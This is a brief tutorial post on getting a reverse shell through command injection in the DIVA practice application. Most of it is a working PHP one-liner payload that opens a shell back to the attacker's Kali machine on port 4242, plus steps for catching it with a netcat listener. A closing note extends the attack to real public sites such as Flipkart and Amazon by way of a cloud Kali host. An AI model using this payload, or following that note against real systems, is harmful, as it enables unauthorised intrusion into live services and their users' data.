Reverse Shell Connection via Command Injection | Shahul Hameed

Command Injection

Initially retrieve the Kali machine IP address via the command: ifconfig

Step 1: Open the DIVA application Command Execution exercise:

Paste the following payload in the input field: > junk;php -r '$sock=fsockopen("",4242);exec("/bin/sh -i <&3 >&3 2>&3");'

Make sure to replace your kali machine IP address.

Step 2: Move to Kali machine and run the nc or (netcat) listener to run the command and wait for a moment to get a reverse connection response from the application.

Note: The above application is on the same private IP in the machine. But for the real-time applications(flipkart,amazon) running in the public IP addresses, we need to use a cloud Kali machine based on public IP address only possible to attack the command injection.



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